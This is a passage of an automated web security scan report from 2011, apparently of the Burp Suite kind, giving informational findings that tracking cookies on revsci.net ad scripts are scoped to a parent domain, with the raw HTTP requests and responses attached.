Set-Cookie: rtc_fVrw=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_UYkU=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_vq52=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_p_N7=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_swop=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_DAhz=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_36jJ=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_EGaf=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Yqe4=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Xkff=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_PotF=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_6iIy=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_rG0R=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Bmc9=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_AIz7=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_owhI=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_YG_I=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_ttgh=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_qIL0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_zoqu=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Wj7v=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_8_Kd=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_HV6c=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_lX7E=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_cMvP=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_PMyZ=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_qp5L=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_LM_E=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_qsf6=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_vgZJ=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_vs0v=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_5KhS=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc__-hU=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_e4dU=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_tBSl=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_1hrT=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_cAs9=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_ufy6=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Zbl-=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_kzjM=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_4dwc=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_7nfY=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_TXTA=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_ifOy=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_uXx-=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_SZmK=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_VzFl=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_MYGJ=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_ePg8=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_2b4r=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_BSfF=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_xPU8=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_MM9p=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_KwBW=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_NX3a=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_QdlW=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_HkOY=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_ZiGI=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_8S1T=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_jqXq=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_bM22=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_cSyo=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc__g8N=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_vWFu=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_sm2o=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_aHEk=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_trlL=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_S6yp=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_46IH=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_fPgs=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_vtS4=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Q7Ad=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_uQON=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_1YTe=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_WRRI=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_iCxA=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_wveS=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_IoVb=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_RU0R=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_XSck=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFOMnC7gMMU594t/Sn7ey31RI0YjFJAbeHbXhIfrk4Ow++ZH8gIQtYr8iWg2RZvh/nqSuFNyBKWw8Xyc7c/RIna/1WF9Q8p6WStaYJPam7yG21EA//kgEQ6MuyzqUKz7IUGE71nqp5Au9VMkKc/okTNLTXO89O6DKukkzJFi3MA0P6larBAMm1+anARqSwCEH+pmFjv+pITclEQ9S5f07ns5ipgm0hyliLId0YqoxKyXj/KVYnPmJ3S57oyns/3A==; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:56:55 GMT; Path=/
Set-Cookie: rtc_wRZH=MLsvsKMucD5nJRGm+X48W1s+JnWw2pAhBM0cosZtfJ9ViXcJRkBPy031UQhZHBj2vSo7My1zYrWwcschx0t7TSkF8tieuR/3XAVwFM0lt/amf/M8PVJdtTynoppWQLwUyw+nQ4vnPoZ4ecjmuzsYWm/I2N73KKVfeX8CHvaFRB/odeHTVhMokPrgK0qQ+4F3yU2W660bYz6wEhP5v4RYC/mf52PIfQqOyndNLJkQCFD+6kkfncm9CKn0SA3XJsqyB7uYxqUSa1VKB2R0mTF1Ysy+cH5CU7aekURYILu4a+PbQ0i+M6NDTvAB/ZnFaR0vRSvwLSTwhp/efqpVeBpt7fymb4N5xV/bBbuIdvrIVZNthFUL8XeqVq3HZxhXhVSm+7A7svJUS5WwVMRvjIc4MEZPO4teely4a6ukWwMIWcaNZJCu8pdF3Xk+rpnQ6GfVFyq9jR0AvAhLLm6Ma1/MjwM=; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:56:55 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:56:55 GMT
Content-Length: 730

/* AG-develop 12.7.1-99 (2011-08-08 18:20:02 UTC) */
rsinetsegs=['I07714_10272','I07714_10273'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.rep
...[SNIP]...

11.34. http://pix04.revsci.net/J06575/a4/0/0/pcx.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /J06575/a4/0/0/pcx.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /J06575/a4/0/0/pcx.js?csid=J06575 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=c84fd631153807952fe54cd0e5ae7570; NETSEGS_J06575=52e7dd6cb6c0ef21&J06575&0&4e87b369&0&&4e61a9e1&68d836b0a1fd7963e56f000759258b9c; udm_0=MLv381MJZihrpr4pFtGoS+vQxWHDxijKIfA0nD1YXO8rJ/xUCrr55GtB6tH+GLXHEIQDRgAUsgpjb8Qra3p01ss8sfNs7AbtWw1NMQHbVuHPxDryQTQWihnYn6mP+qW7rJmsUh6JMJetp9XETN/owC1QhOX+6P7c+4riWzBhBBh0hHlQH0Mljz11bOQQy9Po8Tkt4PBjMGKr1Bfz/My2nRuK7D8C6g9uO0ZdIfyxv6GSjZyInaiZGtamS+7APFob9OU4D23sBW1SwUMD/ds2xnVIonlibiNzi17a2Ci3cn7RNBynKV68utYh0Ovmqr8c1tzfmqX4M2kB+/s7Vy40QxV9eDcyPv7QD2ZZMP07MjwVzu7udeJOT3iLHqAcVBo7UzkvOQovXwg7LkXZVvP1mraXg37hy1xUW9h5fCe5b9lSBlAtX2RjJNd5Kw/DAkI9jR+sOwx5I7QhIO08XzQPAbHeq4X/4/G0hBZxKEA2Dct7ZBd0mftbvhhLi6d9lWU1WG1lXuk4y9NKwM0va2Xyz1Lw09OQZDgIyy1zGMeZrZJg+kwRvgMeIDktJKjBuIf97ZXzLsztk2vWivgmeYpKxJ4wDUGU0S3gU3ABHH8jewoHoUlhxqkQ8jkYD7qVT3LNbOp3PtSUgFgciO/JNV+meBiEZQothOKfU9FUkikghycwnLz4dZuMaSAN/NiLtCNgyxyFJ1pETrJ2iDIwVq101NqbmoFi5OtWvxLh+LOggQVGUKjrcv23bOh6jKQKA8zm/ZYtlTuIqd29QjhV72qNCBkQ0CSsYM/3t7TWnuY9MyASx/5TAztlXKLOg1CAtnJp6ROGov+uw97/AjXH5vzpzlW3bxeSnTaVnDLl5KfroKP5t54TABTyBmMfFNAgoKocMu1r1A0by7U0KerVjRkpDPYNv+su9A5dE4Scx2rJSZTQhGqljz7gnt6TmRr/GY3c4ui3vQztSENzi19mPoa0Q3nd4G8BNsuMvXYo5lUc/gzYQhq5MSpuRIP/Y5jCxpM=; rsiPus_SQhO="MLtXrlMusS9rIAH3clmoJlAWvvGY5puCxew1nF+7KKCLIp00Q0d5+4d5FTJN4jWaW7ZHam54EN93XHnHy0rOylMjoJfpR8Ot/hdAS0oi5KMsVxP6pk60ZMcWicI3+tY5pZTOv5Ye+bO5vJziwOr5sQvsZMEna9myPmHrGexS7N4O52XbrX2OHdV2WE8wa4+Y6mYSng5ukBKpAbT3kl1kOcpkc14LJ+MrtSc5HR18lURkSrIbJb0inGWz9icdk6QiSpIZvCNR5/W8QjD5a5oobWvv91oYNaHqohX0SU9QceoEDdPUBYo751C4r5qQrxiWZUYDP4g="; rsi_us_1000000="pUMdJT+DPwIU1E3imYKC+OknDNarDzE9m/tXM2y5OlYSamN+F+xfdu44vAK1LW9qi2ENBLyeepZhpAoNnAZwwWk7okoNeM6hnY4FDeWNdjLp9DlTHNdGEjk0NgfVVxKB0vEnvngZcDTqBTlUIwh2pwKZacn4hm9cIGhFcXIXBU6SBmPbJnKmYxv/0p5EDN4nttB7hb1PTJwj/3mBGjNllA12sUjy7QOOdLxfEl6GmDjn/ZexM7I/fPI8ijGMSHLODmMGd6cbMIsOXjJJNoa5nJ+eMSF/OABhpFm4wTRoY4cV6nEhA+pPAPy1QsXwnrMI2Zr8YTxWbBFIuEKkLLkygAFgwReoUQA9386ahYRsIEOwLY1DxuNmCEA3ro/eDkCbAcvqEvEaCtehjMwNcehJlJKiT/DVk7YmgejB9LBYfaimbXWiFgHFLjhtiBdhR3QpExC/FZXGtZeYojPCKCYJk+UD2QwPJi0x4kB7qieRJB64L9qQZwSP3sZkJ0s95Evev44uttXviYp1xfQC7lDMqITkrFCcbAngqEdxGJfzn1K4jUovAh1xsgERtdrv5sDDDoP5l7x3v9OMyltap0D9DjeeI2xfPY3JHmgN3/CWnVJ63A+xxBghIzHc1IZiEqULnZ8XSyRBT0sY9Sei6BdID8JWlG406zH6X+6a+fgW0oipqwWFEsM5sQFrrGzszpRAm1Fs0XJgbBEUuIf0mSjMrOz9tB1anlpxt/RSHQozzS8XpqrHBXaDTF3WAjVith8T1kQ1rHVxp0K8xYCAYP4tXhXnOCkNDxOwu9yx2EwoZwPUwZVyA3VLxXvUyTVXxj91/H/aU76/1P6hCLxCrR/eIv22mWPYArDid/UvTXbwSjnYN/HMqJiULRLzLBTBUxAr3GLRtUEz"; NETSEGS_I07714=52e7dd6cb6c0ef21&I07714&0&4e87b3cb&0&&4e619905&68d836b0a1fd7963e56f000759258b9c; rtc_yGBx=MLsvs6FOdg5rJ5G0/9EJWIyw4PHibwH6uVt7/VpenloVcWdNFNZiSxO9y4JBc+DG3WhOTyLGSEm2XKqNsvpwfOWCmJ0c2t+cIL3sSVMoC60oAOQaA0uiQ/KhZUFyt+0zvYGqZnAB4RGmYplfcqtWpNYxHIk/nm2P8mGTBWeBBW+AqOAe1AesQNGNEa3jqWS0zKa8B117g7SP7u4NPTo1wxo+1LK2dj7fi6jyXNyPESyOPB3nXjVgQIWb2uAkhVMzrYIdfgwH0q8JWBvK6DFZGbPCWaFDtzAAHz/pdTyXcdJPSOx98xhP5uBNpeTknXqk2YJ7S7pvoTHbaVmFTviH/UUIjkuAaSrGfELHbX5vv/1BgXGzt7oOVcskB0rxUqhyme0JOcbqr7Sc2eK6lTVu45c5pLhzH2ORR7k7/FLIOA/ayyVBE90wqpSwHe+A4/kXIU6NgxU=; rsi_segs_1000000=pUPFeMPC7nMQFmLKHV0ITey31QIddBjzAHYhBTtuzLxVqYeIB48s6jNq5rQRfJuujANMg2z1OSzDgmK46EHiCpnnSkbJdt0aEgyn07eBOqooss/IiVH+3uWO8suqG+1eoEh/82Cs3O88kec4YiFqAa3rjVYjKvyPYa/IUIgptmEwacIExC/GONy6nw+ajTz9q356DgSSvhE4wrAr/08mqmTgF2jpTG/LERv68+yK6uHsbh5u

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFecPC7nMQFmLKHV2YkRHDFb4MHts9wYbNBNVkVMlSqYeIB48s6jNq5rQRfJuujAOkBmKgLSisXJt9DfidaDjiohm3r3xyDiRc0RSYssEkx82iRCT/vqwD6stqoW/kb/UXziqs3OeNfF8Ao1v9+u7SMzxg3Di8QrmRiZeiI7/W1J7gLPe3aStI9uT91NmYsK/+20IUfTD2rpLQyT66Y1DyWp2L4xjiTUCECLmgubnP; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:49:51 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:49:50 GMT
Content-Length: 820

/* AG-develop 12.7.1-99 (2011-08-08 18:20:02 UTC) */
rsinetsegs=['J06575_10396','J06575_50240','J06575_50735','J06575_50778','J06575_50892'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
va
...[SNIP]...

11.35. http://pix04.revsci.net/J06575/b3/0/3/1008211/66697159.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /J06575/b3/0/3/1008211/66697159.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /J06575/b3/0/3/1008211/66697159.js?D=DM_LOC%3Dhttp%253A%252F%252Fcontent.usatoday.com%252Fcommunities%252Fcampusrivalry%252Ftopics%253Fzipcode%253Dundefined%2526age%253Dundefined%2526gender%253Dundefined%2526country%253Dundefined%2526job%253Dundefined%2526industry%253Dundefined%2526company%2520size%253Dundefined%2526csp%2520code%253D%2526_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fcontent.usatoday.com%252Fcommunities%252Fcampusrivalry%252Fpost%252F2011%252F09%252Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%252F1%26DM_EOM%3D1&C=J06575 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=c84fd631153807952fe54cd0e5ae7570; NETSEGS_J06575=52e7dd6cb6c0ef21&J06575&0&4e87b369&0&&4e61a9e1&68d836b0a1fd7963e56f000759258b9c; udm_0=MLv381MJZihrpr4pFtGoS+vQxWHDxijKIfA0nD1YXO8rJ/xUCrr55GtB6tH+GLXHEIQDRgAUsgpjb8Qra3p01ss8sfNs7AbtWw1NMQHbVuHPxDryQTQWihnYn6mP+qW7rJmsUh6JMJetp9XETN/owC1QhOX+6P7c+4riWzBhBBh0hHlQH0Mljz11bOQQy9Po8Tkt4PBjMGKr1Bfz/My2nRuK7D8C6g9uO0ZdIfyxv6GSjZyInaiZGtamS+7APFob9OU4D23sBW1SwUMD/ds2xnVIonlibiNzi17a2Ci3cn7RNBynKV68utYh0Ovmqr8c1tzfmqX4M2kB+/s7Vy40QxV9eDcyPv7QD2ZZMP07MjwVzu7udeJOT3iLHqAcVBo7UzkvOQovXwg7LkXZVvP1mraXg37hy1xUW9h5fCe5b9lSBlAtX2RjJNd5Kw/DAkI9jR+sOwx5I7QhIO08XzQPAbHeq4X/4/G0hBZxKEA2Dct7ZBd0mftbvhhLi6d9lWU1WG1lXuk4y9NKwM0va2Xyz1Lw09OQZDgIyy1zGMeZrZJg+kwRvgMeIDktJKjBuIf97ZXzLsztk2vWivgmeYpKxJ4wDUGU0S3gU3ABHH8jewoHoUlhxqkQ8jkYD7qVT3LNbOp3PtSUgFgciO/JNV+meBiEZQothOKfU9FUkikghycwnLz4dZuMaSAN/NiLtCNgyxyFJ1pETrJ2iDIwVq101NqbmoFi5OtWvxLh+LOggQVGUKjrcv23bOh6jKQKA8zm/ZYtlTuIqd29QjhV72qNCBkQ0CSsYM/3t7TWnuY9MyASx/5TAztlXKLOg1CAtnJp6ROGov+uw97/AjXH5vzpzlW3bxeSnTaVnDLl5KfroKP5t54TABTyBmMfFNAgoKocMu1r1A0by7U0KerVjRkpDPYNv+su9A5dE4Scx2rJSZTQhGqljz7gnt6TmRr/GY3c4ui3vQztSENzi19mPoa0Q3nd4G8BNsuMvXYo5lUc/gzYQhq5MSpuRIP/Y5jCxpM=; rsiPus_SQhO="MLtXrlMusS9rIAH3clmoJlAWvvGY5puCxew1nF+7KKCLIp00Q0d5+4d5FTJN4jWaW7ZHam54EN93XHnHy0rOylMjoJfpR8Ot/hdAS0oi5KMsVxP6pk60ZMcWicI3+tY5pZTOv5Ye+bO5vJziwOr5sQvsZMEna9myPmHrGexS7N4O52XbrX2OHdV2WE8wa4+Y6mYSng5ukBKpAbT3kl1kOcpkc14LJ+MrtSc5HR18lURkSrIbJb0inGWz9icdk6QiSpIZvCNR5/W8QjD5a5oobWvv91oYNaHqohX0SU9QceoEDdPUBYo751C4r5qQrxiWZUYDP4g="; rsi_us_1000000="pUMdJT+DPwIU1E3imYKC+OknDNarDzE9m/tXM2y5OlYSamN+F+xfdu44vAK1LW9qi2ENBLyeepZhpAoNnAZwwWk7okoNeM6hnY4FDeWNdjLp9DlTHNdGEjk0NgfVVxKB0vEnvngZcDTqBTlUIwh2pwKZacn4hm9cIGhFcXIXBU6SBmPbJnKmYxv/0p5EDN4nttB7hb1PTJwj/3mBGjNllA12sUjy7QOOdLxfEl6GmDjn/ZexM7I/fPI8ijGMSHLODmMGd6cbMIsOXjJJNoa5nJ+eMSF/OABhpFm4wTRoY4cV6nEhA+pPAPy1QsXwnrMI2Zr8YTxWbBFIuEKkLLkygAFgwReoUQA9386ahYRsIEOwLY1DxuNmCEA3ro/eDkCbAcvqEvEaCtehjMwNcehJlJKiT/DVk7YmgejB9LBYfaimbXWiFgHFLjhtiBdhR3QpExC/FZXGtZeYojPCKCYJk+UD2QwPJi0x4kB7qieRJB64L9qQZwSP3sZkJ0s95Evev44uttXviYp1xfQC7lDMqITkrFCcbAngqEdxGJfzn1K4jUovAh1xsgERtdrv5sDDDoP5l7x3v9OMyltap0D9DjeeI2xfPY3JHmgN3/CWnVJ63A+xxBghIzHc1IZiEqULnZ8XSyRBT0sY9Sei6BdID8JWlG406zH6X+6a+fgW0oipqwWFEsM5sQFrrGzszpRAm1Fs0XJgbBEUuIf0mSjMrOz9tB1anlpxt/RSHQozzS8XpqrHBXaDTF3WAjVith8T1kQ1rHVxp0K8xYCAYP4tXhXnOCkNDxOwu9yx2EwoZwPUwZVyA3VLxXvUyTVXxj91/H/aU76/1P6hCLxCrR/eIv22mWPYArDid/UvTXbwSjnYN/HMqJiULRLzLBTBUxAr3GLRtUEz"; NETSEGS_I07714=52e7dd6cb6c0ef21&I07714&0&4e87b3cb&0&&4e619905&68d836b0a1fd7963e56f000759258b9c; rtc_yGBx=MLsvs6FOdg5rJ5G0/9EJWIyw4PHibwH6uVt7/VpenloVcWdNFNZiSxO9y4JBc+DG3WhOTyLGSEm2XKqNsvpwfOWCmJ0c2t+cIL3sSVMoC60oAOQaA0uiQ/KhZUFyt+0zvYGqZnAB4RGmYplfcqtWpNYxHIk/nm2P8mGTBWeBBW+AqOAe1AesQNGNEa3jqWS0zKa8B117g7SP7u4NPTo1wxo+1LK2dj7fi6jyXNyPESyOPB3nXjVgQIWb2uAkhVMzrYIdfgwH0q8JWBvK6DFZGbPCWaFDtzAAHz/pdTyXcdJPSOx98xhP5uBNpeTknXqk2YJ7S7pvoTHbaVmFTviH/UUIjkuAaSrGfELHbX5vv/1BgXGzt7oOVcskB0rxUqhyme0JOcbqr7Sc2eK6lTVu45c5pLhzH2ORR7k7/FLIOA/ayyVBE90wqpSwHe+A4/kXIU6NgxU=; rsi_segs_1000000=pUPFeMPC7nMQFmLKHV0ITey31QIddBjzAHYhBTtuzLxVqYeIB48s6jNq5rQRfJuujANMg2z1OSzDgmK46EHiCpnnSkbJdt0aEgyn07eBOqooss/IiVH+3uWO8suqG+1eoEh/82Cs3O88kec4YiFqAa3rjVYjKvyPYa/IUIgptmEwacIExC/GONy6nw+ajTz9q356DgSSvhE4wrAr/08mqmTgF2jpTG/LERv68+yK6uHsbh5u

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_yGBx=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_o6zg=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_pDT9=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLpQAFxcySqgqIlJtLYIXF5A2b72vfsI5majxIQq1FNPs3tLs01SBJaaPUzsK/FDxqSYmPYVuquFO/SkW6+13sxsgQpcph2m+fNr7WmfBVr4UDtrpA6HAl9Quf4KbetQtZkg8RmyafY39+OIzF9755x3W+AzJvvU=; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:49:54 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
